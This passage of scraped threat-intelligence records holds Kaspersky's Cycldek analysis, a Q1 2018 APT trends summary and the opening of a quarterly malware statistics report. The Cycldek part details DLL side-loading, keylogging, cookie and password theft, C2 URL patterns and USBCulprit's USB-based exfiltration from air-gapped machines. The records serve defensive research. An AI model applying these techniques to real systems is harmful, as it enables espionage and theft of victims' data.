"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882"], "modified": "2023-08-03T10:00:32", "id": "SECURELIST:A71E207678429F2F49013A82A5A5EED4", "href": "https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-03T11:50:54", "description": "\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. 
Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. 
These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n_Figure 1: Timeline of Cycldek-attributed attacks._\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol - McAfee's QuickClean utility, and wsc_proxy.exe, Avast's remediation service.\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. 
Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. Notable characteristics of each cluster's implant are summarized in the table below.\n\n| | **BlueCore** | **RedCore** \n---|---|--- \nInitial Infection Vector | RTF documents | Unknown \nLegitimate AV Utility | QcConsol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) \nSide-Loaded DLL | QcLite.dll | wsc.dll \nPayload Loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm - contains PE loading shellcode and an encrypted RedCore binary \nInjected Process | dllhst3g.exe | explorer.exe or winlogon.exe \nConfiguration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or C:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini \nMutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6}, {F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB}, {E68DFA68-1132-4A32-ADE2-8C87F282C457}, {728264DE-3701-419B-84A4-2AD86B0C43A3}, {2BCD5B61-288C-44D5-BA0D-AAA00E9D2273}, {D9AE3AB0-D123-4F38-A9BE-898C8D49A214} \nCommunicated URL Scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s or http://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s \n \n_Table 1: Comparison of BlueCore and RedCore loader and implant traits._\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n_Figure 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._\n\nMoreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. 
Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n_Figure 3: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single byte XOR with the key 0xFA.\n * _Device enumerator_: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL event. Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. 
The open-source code was modified so that instead of printing the data of the incoming connection, the malware contacts the C&C and informs it about the connection event.
 * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it are validated and passed on to the C&C in their original format.

Perhaps the most notable difference between the two implants is the URL scheme they use to connect to and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.

![Figure 4](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)

**_Figure 4: Difference in URL scheme used by each implant for C2 communication._**

The conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets, with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018.
The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.

![Figure 5 (first panel)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)

![Figure 5 (second panel)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)

**_Figure 5: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018._**

Furthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom-built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. All in all, this suggests the entities operating behind those clusters are sharing multiple resources – both code and infrastructure – and operating under a single organizational umbrella.

![Figure 6](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)

**_Figure 6: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix._**

## Info stealing and lateral movement toolset

During the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes.
There were several types of these tools – some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.

As in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Update (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.

As already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLBins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a NirSoft utility to obtain browsing history from common browsers), ProcDump (a Sysinternals tool used to dump process memory, possibly to obtain passwords from running processes), Nbtscan (a command-line utility intended to scan IP networks for NetBIOS information) and PsExec (a Sysinternals tool used to execute commands remotely in the network, typically used for lateral movement).

The rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:

 * **Custom HDoor**: an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks.
Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>), which made use of the original tool.
The custom version used by Cycldek uses a small subset of the features, and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.

![Figure 7](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)

**_Figure 7: Command line usage of the custom HDoor tool._**

 * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing stolen cookie info. Entries in the file resemble this one:

   ```json
   {
     "domain": ".google.com",
     "id": 1,
     "name": "NID",
     "path": "/",
     "value": "%VALUE%"
   }
   ```

 * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information.
This program includes a descriptive command line message that explains how to use it, as outlined below.

![Figure 8](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)

**_Figure 8: Command line usage of the ChromePass tool._**

## Formerly Unreported Malware: USBCulprit

One of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulprit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.

During the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated into samples detected after 2017 is the capability to execute files with a given name from a connected USB drive. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.

Another change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload.
As a result, the latter can be found in its decrypted form only in memory.

This loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive, named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro), forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.

![Figure 9](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)

**_Figure 9: USBCulprit's loading flow, as observed in samples after 2017._**

Once USBCulprit is loaded to memory and executed, it operates in three phases:

 * **Bootstrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware.

Additionally, the malware makes a single scan to collect files it intends to steal using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that lists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.

The chosen files are then grouped into encrypted RAR archives.
To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.

It is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to hold a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000', corresponding to 01/06/2016 00:00:00.

 * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection are completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.

When a USB drive is connected, the malware verifies whether stolen data should be exfiltrated to it or whether it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' is searched for on the drive and, if not found, is created. This directory is used as the target path for copying files to the drive or as the source path for obtaining them from it.

To understand which direction of file copy should take place, a special marker file named '1.txt' is searched for locally.
If it exists, the malware expects to find the aforementioned '$Recyc1e.Bin' directory on the drive with previously stolen document archives and attempts to copy it to the disk. Otherwise, the local archive files are copied to the same directory from the disk to the drive.

![Figure 10](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)

**_Figure 10: USBCulprit's check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it._**

 * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' is checked locally to decide whether lateral movement should be conducted. Only if this file exists is the malware's binary copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.

Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files on the USB drive and executing them. Examples of these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}. Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess, based on their behavior, that they are used as extension modules or updated versions of the malware itself.
The former is an archive that is extracted to a specific directory, whose files are then enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.

The characteristics of the malware give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB drive and can help attackers profile whether the machine on which the malware was executed is indeed part of a segregated network.

![Figure 11](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)

**_Figure 11: Commands used to profile the network connectivity of the compromised host._**

Another explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions, which could not be found as artifacts elsewhere in our investigation, points to a human factor being required to assist deployment of the malware in victim networks.

## Conclusion

Cycldek is an example of an actor that has broader capability than publicly perceived.
While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.

Furthermore, our analysis of the implants affiliated to the group gives an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. It is perhaps worth noting that we observed multiple points where such entities didn't work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.

Lastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased – it has merely evolved and changed shape, in terms of malware and actors.
We continue to track the actor and report on its activity in our Threat Intelligence Portal.

For more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)

### Appendix - IOCs

_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.

_Published on Securelist, 2020-06-03: "Cycldek: Bridging the (air) gap", <https://securelist.com/cycldek-bridging-the-air-gap/97157/>. Related CVEs: CVE-2012-0158, CVE-2017-11882, CVE-2018-0802._

---

## APT Trends report Q1 2018

In the second quarter of 2017, Kaspersky's Global Research and Analysis Team (GReAT) began publishing summaries of the quarter's private threat intelligence reports in an effort to make the public aware of the research we have been conducting. This report serves as the next installment, focusing on the relevant activities that we observed during Q1 2018.

These summaries serve as a representative snapshot of what has been discussed in greater detail in our private reports, in order to highlight the significant events and findings that we feel people should be aware of. For brevity's sake, we are choosing not to publish indicators associated with the reports highlighted.
However, if you would like to learn more about our intelligence reports or request more information on a specific report, readers are encouraged to contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).

## **Remarkable new findings**

We are always very interested in analyzing new techniques used by existing groups, or in finding new clusters of activity that might lead us to discover new actors. In Q1 2018 we observed a bit of both, which are briefly summarized in this section.

We would like to start by highlighting all the new exploitation techniques applicable to the Meltdown/Spectre vulnerabilities that affect different CPU architectures and vendors. Even though we haven't seen any of them exploited in the wild so far (only several PoCs), and although vendors have provided various patches to mitigate them, there is still no real solution. The problem lies in the optimization methods used at the processor's architecture level. Given that a massive hardware replacement is not a realistic solution, Meltdown and Spectre might very well open the door to new infection vectors and persistence methods that we will see in the future.

A similar case was the announcement of several flaws for AMD processors. Even when the full technical details were not yet available, AMD confirmed that these flaws could be exploited for privilege escalation and persistence once a target has been compromised.

We also observed an increasing interest from attackers, including sophisticated actors, in targeting routers and networking hardware. Some early examples of such attacks driven by advanced groups include Regin and CloudAtlas.
Additionally, the US Government published an advisory on unusual reboots in a prominent router brand, which might indicate that these specific devices are being actively targeted.

In our Slingshot analysis, we described how the campaign was using Mikrotik routers as an infection vector, compromising the routers to later infect the final victim through the very peculiar mechanism that Mikrotik used for the remote management of devices. In actual fact, we recognised the interest of some actors in this particular brand when the Chimay-Red exploit for Mikrotik was mentioned in WikiLeaks' Vault7. This same exploit was later reused by the Hajime botnet in 2018, showing once again how dangerous leaked exploits can be. Even though the vulnerability was fixed by Mikrotik, networking hardware is rarely managed properly from a security perspective. Additionally, Mikrotik reported a zero-day vulnerability ([CVE-2018-7445](<https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow>)) in March 2018.

We believe routers are still an excellent target for attackers, as demonstrated by the examples above, and will continue to be abused in order to get a foothold in the victim's infrastructure.

One of the most relevant attacks during this first quarter of 2018 was the Olympic Destroyer malware, affecting several companies related to the Pyeongchang Olympic Games' organization and some Olympic facilities.
There are different aspects of this attack to highlight, including the fact that attackers compromised companies that were providing services to the games' organization in order to gain access, continuing the dangerous supply chain trend.

Besides the technical considerations, one of the more open questions is related to the general perception that attackers could have done much more harm than they actually did, which opened some speculation as to what the real purpose of the attack was.

![Olympic Destroyer and Bluenoroff header comparison](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/11130221/180411-2018-Q1-APT-activity-1.png>)

**_MZ DOS and Rich headers of both files (3c0d740347b0362331c882c2dee96dbf – OlympicDestroyer, 5d0ffbc8389f27b0649696f0ef5b3cfe – Bluenoroff) are exactly the same._**

In addition, a very relevant aspect is the effort attackers put into planting several elaborate false flags, making this attack one of the most difficult we have analyzed in terms of attribution.

In February, we published a report about a previously unknown advanced Android backdoor that we call Skygofree. It seems that the author could be an Italian company selling the product in a similar way to how Hacking Team did in the past; however, we don't yet have any proof of this. Interestingly, shortly after we detected the Android samples of this malware, we also found an early iOS version of the backdoor. In this case, attackers had abused a rogue MDM (Mobile Device Management) server in order to install their malware on victims' devices, probably using social engineering techniques to trick them into connecting with the rogue MDM.

Finally, we would like to highlight three new actors that we have found, all of them focused on the Asia region:

 * Shaggypanther – A Chinese-speaking cluster of activity targeting government entities, mainly in Taiwan and Malaysia, active since 2008 and using hidden encrypted payloads in registry keys.
We couldn't relate this to any known actor.
 * Sidewinder – An actor mainly targeting Pakistani military targets, active since at least 2012. We have low confidence that this malware might be authored by an Indian company. To spread the malware, they use unique implementations to leverage exploits for known vulnerabilities (such as CVE-2017-11882) and later deploy a PowerShell payload in the final stages.
 * CardinalLizard – We are moderately confident that this is a new collection of Chinese-speaking activity targeting businesses, active since 2014. Over the last few years, the group has shown an interest in the Philippines, Russia, Mongolia and Malaysia, the latter especially prevalent during 2018. The hackers use custom malware featuring some interesting anti-detection and anti-emulation techniques. The infrastructure used also shows some overlaps with RoamingTiger and previous PlugX campaigns, but this could just be due to infrastructure reuse under the Chinese-speaking umbrella.

## **Activity of well-known groups**

Some of the most heavily tracked groups, especially those that are Russian-speaking, didn't show any remarkable activity during the last three months, as far as we know.

We observed limited activity from Sofacy in distributing Gamefish, updating its Zebrocy toolset and potentially registering new domains that might be used for future campaigns. We also saw the group slowly shift its targeting to Asia during the last months.

In the case of Turla (Snake, Uroburos), the group was suspected of breaching the German governmental networks, according to some reports.
The breach was originally reported as Sofacy, but since then no additional technical details or official confirmation have been provided.

The apparent low activity of these groups – and some others such as The Dukes – could be related to some kind of internal reorganization; however, this is purely speculative.

## **Asia - high activity**

The ever-growing APT activity in this part of the world shouldn't be a surprise, especially seeing as the Winter Olympic Games were hosted in South Korea in January 2018. More than 30% of our 27 reports during Q1 were focused on the region.

Probably one of the most interesting activities relates to [Kimsuky](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>), an actor with a North Korean nexus interested in South Korean think tanks and political activities. The actor renewed its arsenal with a completely new framework designed for cyberespionage, which was used in a spear-phishing campaign against South Korean targets, similar to the one targeting [KHNP](<http://h21.hani.co.kr/arti/economy/economy_general/38919.html>) in 2014. According to McAfee, this activity was related to attacks against companies involved in the organization of the Pyeongchang Olympic Games; however, we cannot confirm this.

The Korean focus continues with our analysis of the Flash Player 0-day vulnerability (CVE-2018-4878), deployed by Scarcruft at the end of January and triggered by Microsoft Word documents distributed through at least one website. This vulnerability was quickly reported by the Korean CERT (KN-CERT), which we believe helped to quickly mitigate any aggressive spreading.
At the time of our analysis, we could only detect one victim in South Africa.

![Scarcruft PDB path](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/11130229/180411-2018-Q1-APT-activity-2.png>)

_Forgotten PDB path inside the malware used by Scarcruft with CVE-2018-4876_

Furthermore, IronHusky is a Chinese-speaking actor that we first detected in summer 2017. It is very focused on tracking the geopolitical agenda of targets in central Asia, with a special focus on Mongolia, which seems to be an unusual target. This actor crafts campaigns for upcoming events of interest. In this case, they prepared and launched one right before a meeting between the International Monetary Fund and the Mongolian government at the end of January 2018. At the same time, they stopped their previous operations targeting Russian military contractors, which speaks volumes about the group's limitations. In this new campaign, they exploited CVE-2017-11882 to spread common RATs typically used by Chinese-speaking groups, such as PlugX and PoisonIvy.

The final remark for this section covers the apparently never-ending greed of BlueNoroff, which has been moving to new targets among cryptocurrency companies and expanding its operations to target PoS systems. However, we haven't observed any new remarkable changes in the modus operandi of the group.

## **Middle East - always under pressure**

There was a remarkable peak in StrongPity's activity at the beginning of the year, both in January and March. For this new wave of attacks, the group used a new version of its malware that we simply call StrongPity2. However, the most remarkable aspect is the use of MiTM techniques at the ISP level to spread the malware, redirecting legitimate downloads to their artifacts.
The group combines this method with registering domains that are similar to the ones used for downloading legitimate software.

StrongPity also distributed FinFisher using the same MiTM method at the ISP level, more details of which were provided by CitizenLab.

Desert Falcons showed a peak of activity at the end of 2017 and the beginning of 2018. Their toolset for this new campaign included Android implants that they had previously used back in 2014. The group continues to rely heavily on social engineering methods for malware distribution, and uses rudimentary artifacts for infecting its victims. In this new wave we observed high-profile victims based mostly in Palestine, Egypt, Jordan, Israel, Lebanon and Turkey.

A particularly interesting case we analyzed was the evolution of what we believe to be the Gaza Team actor. What makes us question whether this is the same actor that we have tracked in the past is the fact that we observed a remarkable boost in the artifacts used by the group. We actually can't be sure whether the group suddenly developed these new technical capabilities, or if they had some internal reorganization or acquired improved tools. Another possibility is that the group itself was somehow hacked and a third actor is now distributing their artifacts through them.

## **Final Thoughts**

As a summary of what happened during the last 3 months, we have the impression that some well-known actors are rethinking their strategies and reorganizing their teams for future attacks. In addition, a whole new wave of attackers is becoming much more active. For all these new attackers we observe different levels of sophistication, but let's admit that the entry barrier for cyberespionage is much lower than it used to be in terms of the availability of different tools that can be used for malicious activities. PowerShell, for instance, is one of the most common resources used by any of them.
In other cases, there seems to be a flourishing industry of malware development behind the authorship of the tools that have been used in several campaigns.

Some of the big stories like Olympic Destroyer teach us what kind of difficulties we will likely find in the future in terms of attribution, while also illustrating how effective supply chain attacks still are. Speaking of new infection vectors, some of the CPU vulnerabilities discovered in the last few months will open new possibilities for attackers; unfortunately there is not an easy, universal protection mechanism for all of them. Routing hardware is already an infection vector for some actors, which should make us think whether we are following all the best practices in protecting such devices.

We will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more please reach out to us at intelreports@kasperksy.com.

Record metadata: type securelist; title "APT Trends report Q1 2018"; bulletinFamily blog; published 2018-04-12T10:00:17; modified 2018-04-12T10:00:17; cvelist CVE-2017-11882, CVE-2018-4876, CVE-2018-4878, CVE-2018-7445; href https://securelist.com/apt-trends-report-q1-2018/85280/; id SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E; cvss score 10.0, vector AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/; cvss2 and cvss3 empty.

Next record (lastseen 2017-11-10T11:33:49), description:

## Q3 figures

According to KSN data, Kaspersky Lab solutions detected and repelled **277,646,376** malicious attacks from online resources located in 185 countries all over the world.

**72,012,219** unique URLs were recognized as malicious by web antivirus components.

Attempted infections by malware that aims to steal money via online access to bank accounts were registered on **204,388** user computers.

Crypto ransomware attacks were blocked on **186,283** computers of
unique users.

Kaspersky Lab's file antivirus detected a total of **198,228,428** unique malicious and potentially unwanted objects.

Kaspersky Lab mobile security products detected:

 * **1,598,196** malicious installation packages;
 * **19,748** mobile banking Trojans (installation packages);
 * **108,073** mobile ransomware Trojans (installation packages).

## Mobile threats

### Q3 events

#### The spread of the Asacub banker

In the third quarter, we continued to monitor the activity of the mobile banking Trojan Trojan-Banker.AndroidOS.Asacub that actively spread via SMS spam. Q3 saw cybercriminals carry out a major campaign to distribute the Trojan, resulting in a tripling of the number of users attacked. Asacub activity peaked in July, after which there was a decline in the number of attacks: in September we registered almost three times fewer attacked users than in July.

